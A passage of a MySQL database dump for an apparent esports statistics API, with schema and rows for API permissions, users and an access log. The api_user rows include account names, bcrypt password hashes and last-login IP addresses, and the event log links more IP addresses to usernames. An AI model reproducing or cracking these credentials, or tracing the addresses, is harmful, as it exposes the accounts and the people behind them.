-- Table structure for table `api_group_permission`
--

CREATE TABLE `api_group_permission` (
  `api_group_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `api_group_id` int(11) NOT NULL,
  `api_permission_id` int(11) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`api_group_permission_id`),
  KEY `api_group_permission_api_group_id` (`api_group_id`),
  KEY `api_group_permission_api_permission_id` (`api_permission_id`),
  CONSTRAINT `api_group_permission_api_group_id` FOREIGN KEY (`api_group_id`) REFERENCES `api_group` (`api_group_id`) ON DELETE NO ACTION ON UPDATE NO ACTION,
  CONSTRAINT `api_group_permission_api_permission_id` FOREIGN KEY (`api_permission_id`) REFERENCES `api_permission` (`api_permission_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=296 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_group_permission`
--

INSERT INTO `api_group_permission` VALUES (152,3,1,'2015-03-22 21:07:13'),(153,3,2,'2015-03-22 21:07:13'),(154,3,17,'2015-03-22 21:07:13'),(155,3,18,'2015-03-22 21:07:13'),(156,3,5,'2015-03-22 21:07:13'),(157,3,6,'2015-03-22 21:07:13'),(158,3,3,'2015-03-22 21:07:13'),(159,3,4,'2015-03-22 21:07:13'),(160,3,15,'2015-03-22 21:07:13'),(161,3,16,'2015-03-22 21:07:13'),(162,3,13,'2015-03-22 21:07:13'),(163,3,14,'2015-03-22 21:07:13'),(164,3,19,'2015-03-22 21:07:13'),(165,3,20,'2015-03-22 21:07:13'),(166,3,11,'2015-03-22 21:07:13'),(167,3,12,'2015-03-22 21:07:13'),(168,3,7,'2015-03-22 21:07:13'),(169,3,8,'2015-03-22 21:07:13'),(170,3,23,'2015-03-22 21:07:13'),(171,3,24,'2015-03-22 21:07:13'),(172,3,21,'2015-03-22 21:07:13'),(173,3,22,'2015-03-22 21:07:13'),(174,3,9,'2015-03-22 21:07:13'),(175,3,10,'2015-03-22 21:07:13'),(230,0,1,'2015-03-22 21:07:13'),(231,0,2,'2015-03-22 21:07:13'),(232,0,17,'2015-03-22 21:07:13'),(233,0,18,'2015-03-22 21:07:13'),(234,0,5,'2015-03-22 21:07:13'),(235,0,6,'2015-03-22 21:07:13'),(236,0,3,'2015-03-22 21:07:13'),(237,0,4,'2015-03-22 21:07:13'),(238,0,15,'2015-03-22 21:07:13'),(239,0,16,'2015-03-22 21:07:13'),(240,0,13,'2015-03-22 21:07:13'),(241,0,14,'2015-03-22 21:07:13'),(242,0,19,'2015-03-22 21:07:13'),(243,0,20,'2015-03-22 21:07:13'),(244,0,11,'2015-03-22 21:07:13'),(245,0,12,'2015-03-22 21:07:13'),(246,0,7,'2015-03-22 21:07:13'),(247,0,8,'2015-03-22 21:07:13'),(248,0,23,'2015-03-22 21:07:13'),(249,0,24,'2015-03-22 21:07:13'),(250,0,21,'2015-03-22 21:07:13'),(251,0,22,'2015-03-22 21:07:13'),(252,0,9,'2015-03-22 21:07:13'),(253,0,10,'2015-03-22 21:07:13'),(254,0,27,'2015-03-22 21:07:13'),(255,0,28,'2015-03-22 21:07:13'),(258,1,1,'2015-04-22 00:46:17'),(259,1,2,'2015-04-22 00:46:17'),(260,1,17,'2015-04-22 00:46:17'),(261,1,18,'2015-04-22 00:46:17'),(262,1,5,'2015-04-22 00:46:17'),(263,1,6,'2015-04-22 00:46:17'),(264,1,3,'2015-04-22 00:46:17'),(265,1,4,'2015-04-22 00:46:17'),(266,1,15,'2015-04-22 00:46:17'),(267,1,16,'2015-04-22 00:46:17'),(268,1,13,'2015-04-22 00:46:17'),(269,1,14,'2015-04-22 00:46:17'),(270,1,19,'2015-04-22 00:46:17'),(271,1,20,'2015-04-22 00:46:17'),(272,1,11,'2015-04-22 00:46:17'),(273,1,12,'2015-04-22 00:46:17'),(274,1,7,'2015-04-22 00:46:17'),(275,1,8,'2015-04-22 00:46:17'),(276,1,23,'2015-04-22 00:46:17'),(277,1,24,'2015-04-22 00:46:17'),(278,1,21,'2015-04-22 00:46:17'),(279,1,22,'2015-04-22 00:46:17'),(280,1,9,'2015-04-22 00:46:17'),(281,1,10,'2015-04-22 00:46:17'),(282,1,27,'2015-04-22 00:46:17'),(283,1,28,'2015-04-22 00:46:17'),(286,1,29,'2015-04-23 00:56:17'),(288,1,0,'2015-04-23 01:27:59'),(289,1,30,'2015-04-23 01:50:36'),(290,1,31,'2015-06-03 13:51:08'),(291,1,32,'2015-06-03 13:51:08'),(292,1,33,'2015-06-17 23:51:08'),(293,1,34,'2015-06-26 00:11:38'),(294,1,35,'2015-06-26 00:11:38'),(295,1,36,'2015-06-26 00:11:39');

--
-- Table structure for table `api_permission`
--

CREATE TABLE `api_permission` (
  `api_permission_id` int(11) NOT NULL AUTO_INCREMENT,
  `class` varchar(30) NOT NULL,
  `method` varchar(30) NOT NULL,
  `label` varchar(30) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`api_permission_id`)
) ENGINE=InnoDB AUTO_INCREMENT=37 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_permission`
--

INSERT INTO `api_permission` VALUES (0,'playergames','playergame','Get Playergames','2015-04-23 01:24:58'),(1,'champions','index','List Champions','0000-00-00 00:00:00'),(2,'champions','champion','Get Champion','0000-00-00 00:00:00'),(3,'leagues','index','List Leagues','0000-00-00 00:00:00'),(4,'leagues','league','Get League','0000-00-00 00:00:00'),(5,'items','index','List Items','0000-00-00 00:00:00'),(6,'items','item','Get Item','0000-00-00 00:00:00'),(7,'spells','index','List Spells','0000-00-00 00:00:00'),(8,'spells','spell','Get Spell','0000-00-00 00:00:00'),(9,'teams','index','List Teams','0000-00-00 00:00:00'),(10,'teams','team','Get Team','0000-00-00 00:00:00'),(11,'roles','index','List Roles','0000-00-00 00:00:00'),(12,'roles','role','Get Role','0000-00-00 00:00:00'),(13,'players','index','List Players','0000-00-00 00:00:00'),(14,'players','player','Get Player','0000-00-00 00:00:00'),(15,'overseers','index','List Overseers','0000-00-00 00:00:00'),(16,'overseers','overseer','Get Overseer','0000-00-00 00:00:00'),(17,'games','index','List Games','0000-00-00 00:00:00'),(18,'games','game','Get Game','0000-00-00 00:00:00'),(19,'regions','index','List Regions','0000-00-00 00:00:00'),(20,'regions','region','Get Region','0000-00-00 00:00:00'),(21,'statuses','index','List Statuses','0000-00-00 00:00:00'),(22,'statuses','status','Get Status','0000-00-00 00:00:00'),(23,'splits','index','List Splits','0000-00-00 00:00:00'),(24,'splits','split','Get Split','0000-00-00 00:00:00'),(27,'tournaments','index','List Tournaments','2014-08-23 09:49:52'),(28,'tournaments','tournament','Get Tournament','2014-08-23 09:49:52'),(29,'games','gamedata','Get Game data','2015-04-23 00:53:13'),(30,'playergames','playergamegame','Playergame Games','2015-04-23 01:50:21'),(31,'games','league_split','Get League split','2015-06-02 15:03:17'),(32,'games','tournament','Get Tournament','2015-06-02 15:03:17'),(33,'games','gamestats','Get Gamestats','2015-06-17 23:03:17'),(34,'players','esportsplayers','Get Players with eSportsId','2015-06-26 00:11:34'),(35,'games','esportsgamedata','Get Game data with eSports API','2015-06-26 00:11:34'),(36,'games','esportsgamestats','Get Gamestats with eSports API','2015-06-26 00:11:35');

--
-- Table structure for table `api_user`
--

CREATE TABLE `api_user` (
  `api_user_id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(50) NOT NULL,
  `password` varchar(255) NOT NULL,
  `status` int(1) NOT NULL,
  `last_login` int(11) NOT NULL,
  `last_ip` varchar(15) NOT NULL,
  `api_group_id` int(11) NOT NULL,
  `update_time` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP,
  PRIMARY KEY (`api_user_id`),
  KEY `api_users_group_id` (`api_group_id`),
  CONSTRAINT `api_users_group_id` FOREIGN KEY (`api_group_id`) REFERENCES `api_group` (`api_group_id`) ON DELETE NO ACTION ON UPDATE NO ACTION
) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_user`
--

INSERT INTO `api_user` VALUES (0,'testing','$2y$09$jBUbCR8RHCloYRUA.QtPC.Tmarck2e3DUQ9/gsl9cfWCNZFeS06b6',1,1435283446,'84.24.3.137',1,'2015-06-23 04:40:12'),(1,'vulcun','$2y$09$9NP1ldDqBA90bwrYlw66Ru8Jf.Hs4jR5ggekCilS0B/6C5C3OuD5.',1,1435107832,'67.207.109.186',1,'2015-06-23 04:40:30'),(2,'draftkings','$2y$09$LQ4tdbRgzM7EWy1W72zgse.EeW4DBD72h4unChb0lriEmFcd2T6Nu',1,1432137463,'96.239.100.139',1,'2015-06-23 04:40:58'),(4,'javadrop','$2y$09$6VLTnJ9TsbCGjpBuBHDCue2.rzj/blRsZ452Ul5Z43YcjkCzMCXLm',1,1435283694,'54.85.230.222',1,'2015-06-20 16:05:52'),(5,'draftorpass','$2y$09$7hofKIRlDtolxBJ1QsIRjOxSIjkvgTIA2V72NxaoAE5kNqdoK.HnG',1,1432922148,'84.24.3.137',1,'2015-06-23 04:40:51'),(6,'draftpot','$2y$09$peHd6HV1Y.yr7RXClCVqKO.CxaKJhGMiehSkV6u5dQcHKztb4UlYa',1,1435242278,'74.68.117.164',1,'2015-06-23 04:39:48'),(7,'esportsify','$2y$09$ioQ59aowdB09yUif0PKCrO12Z02pSxDbCjSxYV3IoVRCIQ5mG6Tn.',1,1435077081,'84.24.3.137',1,'2015-06-22 22:22:32');

--
-- Table structure for table `api_user_event`
--

CREATE TABLE `api_user_event` (
  `api_user_event_id` int(11) NOT NULL AUTO_INCREMENT,
  `ip_address` varchar(15) NOT NULL,
  `type` int(2) NOT NULL,
  `controller` varchar(30) NOT NULL,
  `method` varchar(30) NOT NULL,
  `timestamp` int(11) NOT NULL,
  `user_name` varchar(30) NOT NULL,
  `target_id` int(11) NOT NULL,
  `data` longtext NOT NULL,
  PRIMARY KEY (`api_user_event_id`)
) ENGINE=InnoDB AUTO_INCREMENT=2900 DEFAULT CHARSET=utf8;

--
-- Dumping data for table `api_user_event`
--

INSERT INTO `api_user_event` VALUES (996,'84.24.3.137',1,'players','index',1434997295,'testing',0,'a:0:{}'),(997,'84.24.3.137',1,'players','index',1434997330,'esportsify',0,'a:0:{}'),(998,'84.24.3.137',1,'games','league_split',1434998872,'testing',2,'a:0:{}'),(999,'84.24.3.137',1,'games','league_split',1434998875,'testing',3,'a:0:{}'),(1000,'84.24.3.137',1,'games','index',1434998878,'testing',-1,'a:0:{}'),(1001,'84.24.3.137',2,'games','gamestats',1434999521,'testing',60,'a:0:{}'),(1002,'84.24.3.137',2,'games','gamedata',1434999524,'testing',60,'a:0:{}'),(1003,'84.24.3.137',1,'players','index',1434999534,'testing',-1,'a:0:{}'),(1004,'92.40.249.160',1,'games','league_split',1435001500,'esportsify',2,'a:0:{}'),(1005,'74.68.117.164',2,'games','gamedata',1435068852,'draftpot',80,'a:0:{}'),(1006,'84.24.3.137',1,'players','index',1435072454,'testing',-1,'a:0:{}'),(1007,'42.2.180.167',1,'players','index',1435072469,'testing',-1,'a:0:{}'),(1008,'84.24.3.137',2,'games','gamestats',1435076394,'testing',60,'a:0:{}'),(1009,'84.24.3.137',2,'games','gamestats',1435076397,'testing',60,'a:0:{}'),(1010,'84.24.3.137',2,'games','gamestats',1435076400,'testing',60,'a:0:{}'),(1011,'84.24.3.137',2,'games','gamestats',1435076403,'testing',60,'a:0:{}'),(1012,'84.24.3.137',2,'games','gamestats',1435076406,'testing',60,'a:0:{}'),(1013,'84.24.3.137',2,'games','gamestats',1435076409,'testing',60,'a:0:{}'),(1014,'84.24.3.137',2,'games','gamestats',1435076412,'testing',60,'a:0:{}'),(1015,'84.24.3.137',2,'games','gamestats',1435076415,'testing',60,'a:0:{}'),(1016,'84.24.3.137',2,'games','gamestats',1435076418,'testing',60,'a:0:{}'),(1017,'84.24.3.137',2,'games','gamestats',1435076421,'testing',60,'a:0:{}'),(1018,'84.24.3.137',2,'games','gamestats',1435076424,'testing',60,'a:0:{}'),(1019,'84.24.3.137',2,'games','gamestats',1435076427,'testing',60,'a:0:{}'),(1020,'84.24.3.137',2,'games','gamestats',1435076430,'testing',60,'a:0:{}'),(1021,'84.24.3.137',2,'games','gamestats',1435076433,'testing',60,'a:0:{}'),(1022,'150.212.3.161',2,'games','gamestats',1435076435,'testing',60,'a:0:{}'),(1023,'84.24.3.137',2,'games','gamestats',1435076436,'testing',60,'a:0:{}'),(1024,'150.212.3.161',2,'games','gamestats',1435076438,'testing',60,'a:0:{}'),(1025,'84.24.3.137',2,'games','gamestats',1435076439,'testing',60,'a:0:{}'),(1026,'150.212.3.161',2,'games','gamestats',1435076441,'testing',60,'a:0:{}'),(1027,'84.24.3.137',2,'games','gamestats',1435076442,'testing',60,'a:0:{}'),(1028,'150.212.3.161',2,'games','gamestats',1435076444,'testing',60,'a:0:{}'),(1029,'84.24.3.137',2,'games','gamestats',1435076445,'testing',60,'a:0:{}'),(1030,'150.212.3.161',2,'games','gamestats',1435076447,'testing',60,'a:0:{}'),(1031,'84.24.3.137',2,'games','gamestats',1435076448,'testing',60,'a:0:{}'),(1032,'84.24.3.137',2,'games','gamestats',1435076448,'testing',60,'a:0:{}'),(1033,'150.212.3.161',2,'games','gamestats',1435076450,'testing',60,'a:0:{}'),(1034,'150.212.3.161',2,'games','gamestats',1435076453,'testing',60,'a:0:{}'),(1035,'150.212.3.161',2,'games','gamestats',1435076456,'testing',60,'a:0:{}'),(1036,'150.212.3.161',2,'games','gamestats',1435076459,'testing',60,'a:0:{}'),(1037,'150.212.3.161',2,'games','gamestats',1435076462,'testing',60,'a:0:{}'),(1038,'150.212.3.161',2,'games','gamestats',1435076465,'testing',60,'a:0:{}'),(1039,'150.212.3.161',2,'games','gamestats',1435076468,'testing',60,'a:0:{}'),(1040,'150.212.3.161',2,'games','gamestats',1435076471,'testing',60,'a:0:{}'),(1041,'150.212.3.161',2,'games','gamestats',1435076474,'testing',60,'a:0:{}'),(1042,'150.212.3.161',2,'games','gamestats',1435076477,'testing',60,'a:0:{}'),(1043,'84.24.3.137',2,'games','gamestats',1435076479,'testing',60,'a:0:{}'),(1044,'150.212.3.161',2,'games','gamestats',1435076480,'testing',60,'a:0:{}'),(1045,'84.24.3.137',2,'games','gamestats',1435076482,'testing',60,'a:0:{}'),(1046,'150.212.3.161',2,'games','gamestats',1435076483,'testing',60,'a:0:{}'),(1047,'84.24.3.137',2,'games','gamestats',1435076485,'testing',60,'a:0:{}'),(1048,'150.212.3.161',2,'games','gamestats',1435076486,'testing',60,'a:0:{}'),(1049,'84.24.3.137',2,'games','gamestats',1435076488,'testing',60,'a:0:{}'),(1050,'150.212.3.161',2,'games','gamestats',1435076489,'testing',60,'a:0:{}'),(1051,'84.24.3.137',2,'games','gamestats',1435076491,'testing',60,'a:0:{}'),(1052,'150.212.3.161',2,'games','gamestats',1435076492,'testing',60,'a:0:{}'),(1053,'84.24.3.137',2,'games','gamestats',1435076494,'testing',60,'a:0:{}'),(1054,'150.212.3.161',2,'games','gamestats',1435076495,'testing',60,'a:0:{}'),(1055,'84.24.3.137',2,'games','gamestats',1435076497,'testing',60,'a:0:{}'),(1056,'150.212.3.161',2,'games','gamestats',1435076498,'testing',60,'a:0:{}'),(1057,'84.24.3.137',2,'games','gamestats',1435076500,'testing',60,'a:0:{}'),(1058,'150.212.3.161',2,'games','gamestats',1435076501,'testing',60,'a:0:{}'),(1059,'84.24.3.137',2,'games','gamestats',1435076503,'testing',60,'a:0:{}'),(1060,'150.212.3.161',2,'games','gamestats',1435076504,'testing',60,'a:0:{}'),(1061,'84.24.3.137',2,'games','gamestats',1435076506,'testing',60,'a:0:{}'),(1062,'150.212.3.161',2,'games','gamestats',1435076507,'testing',60,'a:0:{}'),(1063,'84.24.3.137',2,'games','gamestats',1435076509,'testing',60,'a:0:{}'),(1064,'150.212.3.161',2,'games','gamestats',1435076510,'testing',60,'a:0:{}'),(1065,'84.24.3.137',2,'games','gamestats',1435076512,'testing',60,'a:0:{}'),(1066,'150.212.3.161',2,'games','gamestats',1435076513,'testing',60,'a:0:{}'),(1067,'84.24.3.137',2,'games','gamestats',1435076515,'testing',60,'a:0:{}'),(1068,'150.212.3.161',2,'games','gamestats',1435076516,'testing',60,'a:0:{}'),(1069,'84.24.3.137',2,'games','gamestats',1435076518,'testing',60,'a:0:{}'),(1070,'150.212.3.161',2,'games','gamestats',1435076519,'testing',60,'a:0:{}'),(1071,'84.24.3.137',2,'games','gamestats',1435076521,'testing',60,'a:0:{}'),(1072,'150.212.3.161',2,'games','gamestats',1435076522,'testing',60,'a:0:{}'),(1073,'84.24.3.137',2,'games','gamestats',1435076524,'testing',60,'a:0:{}'),(1074,'150.212.3.161',2,'games','gamestats',1435076525,'testing',60,'a:0:{}'),(1075,'84.24.3.137',2,'games','gamestats',1435076527,'testing',60,'a:0:{}'),(1076,'150.212.3.161',2,'games','gamestats',1435076528,'testing',60,'a:0:{}'),(1077,'84.24.3.137',2,'games','gamestats',1435076530,'testing',60,'a:0:{}'),(1078,'150.212.3.161',2,'games','gamestats',1435076531,'testing',60,'a:0:{}'),(1079,'84.24.3.137',2,'games','gamestats',1435076533,'testing',60,'a:0:{}'),(1080,'150.212.3.161',2,'games','gamestats',1435076534,'testing',60,'a:0:{}'),(1081,'84.24.3.137',2,'games','gamestats',1435076536,'testing',60,'a:0:{}'),(1082,'150.212.3.161',2,'games','gamestats',1435076537,'testing',60,'a:0:{}'),(1083,'84.24.3.137',2,'games','gamestats',1435076539,'testing',60,'a:0:{}'),(1084,'150.212.3.161',2,'games','gamestats',1435076540,'testing',60,'a:0:{}'),(1085,'84.24.3.137',2,'games','gamestats',1435076542,'testing',60,'a:0:{}'),(1086,'150.212.3.161',2,'games','gamestats',1435076543,'testing',60,'a:0:{}'),(1087,'84.24.3.137',2,'games','gamestats',1435076545,'testing',60,'a:0:{}'),(1088,'150.212.3.161',2,'games','gamestats',1435076546,'testing',60,'a:0:{}'),(1089,'84.24.3.137',2,'games','gamestats',1435076548,'testing',60,'a:0:{}'),(1090,'150.212.3.161',2,'games','gamestats',1435076549,'testing',60,'a:0:{}'),(1091,'84.24.3.137',2,'games','gamestats',1435076551,'testing',60,'a:0:{}'),(1092,'150.212.3.161',2,'games','gamestats',1435076552,'testing',60,'a:0:{}'),(1093,'84.24.3.137',2,'games','gamestats',1435076554,'testing',60,'a:0:{}'),(1094,'150.212.3.161',2,'games','gamestats',1435076555,'testing',60,'a:0:{}'),(1095,'84.24.3.137',2,'games','gamestats',1435076557,'testing',60,'a:0:{}'),(1096,'150.212.3.161',2,'games','gamestats',1435076558,'testing',60,'a:0:{}'),(1097,'84.24.3.137',2,'games','gamestats',1435076560,'testing',60,'a:0:{}'),(1098,'150.212.3.161',2,'games','gamestats',1435076561,'testing',60,'a:0:{}'),(1099,'84.24.3.137',2,'games','gamestats',1435076563,'testing',60,'a:0:{}'),(1100,'150.212.3.161',2,'games','gamestats',1435076564,'testing',60,'a:0:{}'),(1101,'84.24.3.137',2,'games','gamestats',1435076566,'testing',60,'a:0:{}'),(1102,'150.212.3.161',2,'games','gamestats',1435076567,'testing',60,'a:0:{}'),(1103,'84.24.3.137',2,'games','gamestats',1435076569,'testing',60,'a:0:{}'),(1104,'150.212.3.161',2,'games','gamestats',1435076570,'testing',60,'a:0:{}'),(1105,'84.24.3.137',2,'games','gamestats',1435076572,'testing',60,'a:0:{}'),(1106,'150.212.3.161',2,'games','gamestats',1435076573,'testing',60,'a:0:{}'),(1107,'84.24.3.137',2,'games','gamestats',1435076575,'testing',60,'a:0:{}'),(1108,'150.212.3.161',2,'games','gamestats',1435076576,'testing',60,'a:0:{}'),(1109,'84.24.3.137',2,'games','gamestats',1435076578,'testing',60,'a:0:{}'),(1110,'150.212.3.161',2,'games','gamestats',1435076579,'testing',60,'a:0:{}'),(1111,'84.24.3.137',2,'games','gamestats',1435076581,'testing',60,'a:0:{}'),(1112,'150.212.3.161',2,'games','gamestats',1435076582,'testing',60,'a:0:{}'),(1113,'84.24.3.137',2,'games','gamestats',1435076584,'testing',60,'a:0:{}'),(1114,'150.212.3.161',2,'games','gamestats',1435076585,'testing',60,'a:0:{}'),(1115,'84.24.3.137',2,'games','gamestats',1435076587,'testing',60,'a:0:{}'),(1116,'150.212.3.161',2,'games','gamestats',1435076588,'testing',60,'a:0:{}'),(1117,'84.24.3.137',2,'games','gamestats',1435076590,'testing',60,'a:0:{}'),(1118,'150.212.3.161',2,'games','gamestats',1435076591,'testing',60,'a:0:{}'),(1119,'84.24.3.137',2,'games','gamestats',1435076593,'testing',60,'a:0:{}'),(1120,'150.212.3.161',2,'games','gamestats',1435076594,'testing',60,'a:0:{}'),(1121,'84.24.3.137',2,'games','gamestats',1435076596,'testing',60,'a:0:{}'),(1122,'150.212.3.161',2,'games','gamestats',1435076597,'testing',60,'a:0:{}'),(1123,'84.24.3.137',2,'games','gamestats',1435076599,'testing',60,'a:0:{}'),(1124,'150.212.3.161',2,'games','gamestats',1435076600,'testing',60,'a:0:{}'),(1125,'150.212.3.161',2,'games','gamestats',1435076603,'testing',60,'a:0:{}'),(1126,'150.212.3.161',2,'games','gamestats',1435076606,'testing',60,'a:0:{}'),(1127,'150.212.3.161',2,'games','gamestats',1435076609,'testing',60,'a:0:{}'),(1128,'150.212.3.161',2,'games','gamestats',1435076612,'testing',60,'a:0:{}'),(1129,'150.212.3.161',2,'games','gamestats',1435076615,'testing',60,'a:0:{}'),(1130,'150.212.3.161',2,'games','gamestats',1435076618,'testing',60,'a:0:{}'),(1131,'150.212.3.161',2,'games','gamestats',1435076621,'testing',60,'a:0:{}'),(1132,'150.212.3.161',2,'games','gamestats',1435076624,'testing',60,'a:0:{}'),(1133,'150.212.3.161',2,'games','gamestats',1435076627,'testing',60,'a:0:{}'),(1134,'150.212.3.161',2,'games','gamestats',1435076630,'testing',60,'a:0:{}'),(1135,'150.212.3.161',2,'games','gamestats',1435076634,'testing',60,'a:0:{}'),(1136,'150.212.3.161',2,'games','gamestats',1435076637,'testing',60,'a:0:{}'),(1137,'150.212.3.161',2,'games','gamestats',1435076641,'testing',60,'a:0:{}'),(1138,'150.212.3.161',2,'games','gamestats',1435076644,'testing',60,'a:0:{}'),(1139,'150.212.3.161',2,'games','gamestats',1435076648,'testing',60,'a:0:{}'),(1140,'150.212.3.161',2,'games','gamestats',1435076652,'testing',60,'a:0:{}'),(1141,'150.212.3.161',2,'games','gamestats',1435076655,'testing',60,'a:0:{}'),(1142,'150.212.3.161',2,'games','gamestats',1435076658,'testing',60,'a:0:{}'),(1143,'150.212.3.161',2,'games','gamestats',1435076661,'testing',60,'a:0:{}'),(1144,'150.212.3.161',2,'games','gamestats',1435076664,'testing',60,'a:0:{}'),(1145,'150.212.3.161',2,'games','gamestats',1435076668,'testing',60,'a:0:{}'),(1146,'150.212.3.161',2,'games','gamestats',1435076671,'testing',60,'a:0:{}'),(1147,'150.212.3.161',2,'games','gamestats',1435076674,'testing',60,'a:0:{}'),(1148,'150.212.3.161',2,'games','gamestats',1435076677,'testing',60,'a:0:{}'),(1149,'150.212.3.161',2,'games','gamestats',1435076680,'testing',60,'a:0:{}'),(1150,'150.212.3.161',2,'games','gamestats',1435076683,'testing',60,'a:0:{}'),(1151,'150.212.3.161',2,'games','gamestats',1435076686,'testing',60,'a:0:{}'),(1152,'150.212.3.161',2,'games','gamestats',1435076689,'testing',60,'a:0:{}'),(1153,'150.212.3.161',2,'games','gamestats',1435076693,'testing',60,'a:0:{}'),(1154,'150.212.3.161',2,'games','gamestats',1435076696,'testing',60,'a:0:{}'),(1155,'150.212.3.161',2,'games','gamestats',1435076699,'testing',60,'a:0:{}'),(1156,'150.212.3.161',2,'games','gamestats',1435076703,'testing',60,'a:0:{}'),(1157,'150.212.3.161',2,'games','gamestats',1435076706,'testing',60,'a:0:{}'),(1158,'150.212.3.161',2,'games','gamestats',1435076710,'testing',60,'a:0:{}'),(1159,'150.212.3.161',2,'games','gamestats',1435076713,'testing',60,'a:0:{}'),(1160,'150.212.3.161',2,'games','gamestats',1435076717,'testing',60,'a:0:{}'),(1161,'150.212.3.161',2,'games','gamestats',1435076721,'testing',60,'a:0:{}'),(1162,'150.212.3.161',2,'games','gamestats',1435076724,'testing',60,'a:0:{}'),(1163,'150.212.3.161',2,'games','gamestats',1435076728,'testing',60,'a:0:{}'),(1164,'150.212.3.161',2,'games','gamestats',1435076731,'testing',60,'a:0:{}'),(1165,'150.212.3.161',2,'games','gamestats',1435076735,'testing',60,'a:0:{}'),(1166,'150.212.3.161',2,'games','gamestats',1435076739,'testing',60,'a:0:{}'),(1167,'150.212.3.161',2,'games','gamestats',1435076743,'testing',60,'a:0:{}'),(1168,'150.212.3.161',2,'games','gamestats',1435076746,'testing',60,'a:0:{}'),(1169,'150.212.3.161',2,'games','gamestats',1435076750,'testing',60,'a:0:{}'),(1170,'150.212.3.161',2,'games','gamestats',1435076754,'testing',60,'a:0:{}'),(1171,'150.212.3.161',2,'games','gamestats',1435076758,'testing',60,'a:0:{}'),(1172,'150.212.3.161',2,'games','gamestats',1435076762,'testing',60,'a:0:{}'),(1173,'150.212.3.161',2,'games','gamestats',1435076766,'testing',60,'a:0:{}'),(1174,'150.212.3.161',2,'games','gamestats',1435076770,'testing',60,'a:0:{}'),(1175,'150.212.3.161',2,'games','gamestats',1435076773,'testing',60,'a:0:{}'),(1176,'150.212.3.161',2,'games','gamestats',1435076777,'testing',60,'a:0:{}'),(1177,'150.212.3.161',2,'games','gamestats',1435076780,'testing',60,'a:0:{}'),(1178,'150.212.3.161',2,'games','gamestats',1435076784,'testing',60,'a:0:{}'),(1179,'150.212.3.161',2,'games','gamestats',1435076788,'testing',60,'a:0:{}'),(1180,'150.212.3.161',2,'games','gamestats',1435076792,'testing',60,'a:0:{}'),(1181,'150.212.3.161',2,'games','gamestats',1435076796,'testing',60,'a:0:{}'),(1182,'150.212.3.161',2,'games','gamestats',1435076799,'testing',60,'a:0:{}'),(1183,'150.212.3.161',2,'games','gamestats',1435076802,'testing',60,'a:0:{}'),(1184,'150.212.3.161',2,'games','gamestats',1435076806,'testing',60,'a:0:{}'),(1185,'150.212.3.161',2,'games','gamestats',1435076810,'testing',60,'a:0:{}'),(1186,'150.212.3.161',2,'games','gamestats',1435076814,'testing',60,'a:0:{}'),(1187,'150.212.3.161',2,'games','gamestats',1435076818,'testing',60,'a:0:{}'),(1188,'150.212.3.161',2,'games','gamestats',1435076822,'testing',60,'a:0:{}'),(1189,'150.212.3.161',2,'games','gamestats',1435076826,'testing',60,'a:0:{}'),(1190,'150.212.3.161',2,'games','gamestats',1435076830,'testing',60,'a:0:{}'),(1191,'150.212.3.161',2,'games','gamestats',1435076833,'testing',60,'a:0:{}'),(1192,'150.212.3.161',2,'games','gamestats',1435076836,'testing',60,'a:0:{}'),(1193,'150.212.3.161',2,'games','gamestats',1435076840,'testing',60,'a:0:{}'),(1194,'150.212.3.161',2,'games','gamestats',1435076844,'testing',60,'a:0:{}'),(1195,'150.212.3.161',2,'games','gamestats',1435076848,'testing',60,'a:0:{}'),(1196,'150.212.3.161',2,'games','gamestats',1435076852,'testing',60,'a:0:{}'),(1197,'150.212.3.161',2,'games','gamestats',1435076856,'testing',60,'a:0:{}'),(1198,'150.212.3.161',2,'games','gamestats',1435076860,'testing',60,'a:0:{}'),(1199,'150.212.3.161',2,'games','gamestats',1435076864,'testing',60,'a:0:{}'),(1200,'150.212.3.161',2,'games','gamestats',1435076867,'testing',60,'a:0:{}'),(1201,'150.212.3.161',2,'games','gamestats',1435076871,'testing',60,'a:0:{}'),(1202,'150.212.3.161',2,'games','gamestats',1435076875,'testing',60,'a:0:{}'),(1203,'150.212.3.161',2,'games','gamestats',1435076879,'testing',60,'a:0:{}'),(1204,'150.212.3.161',2,'games','gamestats',1435076882,'testing',60,'a:0:{}'),(1205,'150.212.3.161',2,'games','gamestats',1435076886,'testing',60,'a:0:{}'),(1206,'150.212.3.161',2,'games','gamestats',1435076890,'testing',60,'a:0:{}'),(1207,'150.212.3.161',2,'games','gamestats',1435076894,'testing',60,'a:0:{}'),(1208,'150.212.3.161',2,'games','gamestats',1435076898,'testing',60,'a:0:{}'),(1209,'150.212.3.161',2,'games','gamestats',1435076901,'testing',60,'a:0:{}'),(1210,'150.212.3.161',2,'games','gamestats',1435076904,'testing',60,'a:0:{}'),(1211,'150.212.3.161',2,'games','gamestats',1435076908,'testing',60,'a:0:{}'),(1212,'42.2.180.167',2,'games','gamestats',1435076909,'testing',60,'a:0:{}'),(1213,'150.212.3.161',2,'games','gamestats',1435076911,'testing',60,'a:0:{}'),(1214,'42.2.180.167',2,'games','gamestats',1435076912,'testing',60,'a:0:{}'),(1215,'42.2.180.167',2,'games','gamestats',1435076915,'testing',60,'a:0:{}'),(1216,'150.212.3.161',2,'games','gamestats',1435076915,'testing',60,'a:0:{}'),(1217,'42.2.180.167',2,'games','gamestats',1435076917,'testing',60,'a:0:{}'),(1218,'150.212.3.161',2,'games','gamestats',1435076918,'testing',60,'a:0:{}'),(1219,'42.2.180.167',2,'games','gamestats',1435076920,'testing',60,'a:0:{}'),(1220,'150.212.3.161',2,'games','gamestats',1435076922,'testing',60,'a:0:{}'),(1221,'42.2.180.167',2,'games','gamestats',1435076923,'testing',60,'a:0:{}'),(1222,'150.212.3.161',2,'games','gamestats',1435076925,'testing',60,'a:0:{}'),(1223,'42.2.180.167',2,'games','gamestats',1435076926,'testing',60,'a:0:{}'),(1224,'150.212.3.161',2,'games','gamestats',1435076929,'testing',60,'a:0:{}'),(1225,'150.212.3.161',2,'games','gamestats',1435076932,'testing',60,'a:0:{}'),(1226,'150.212.3.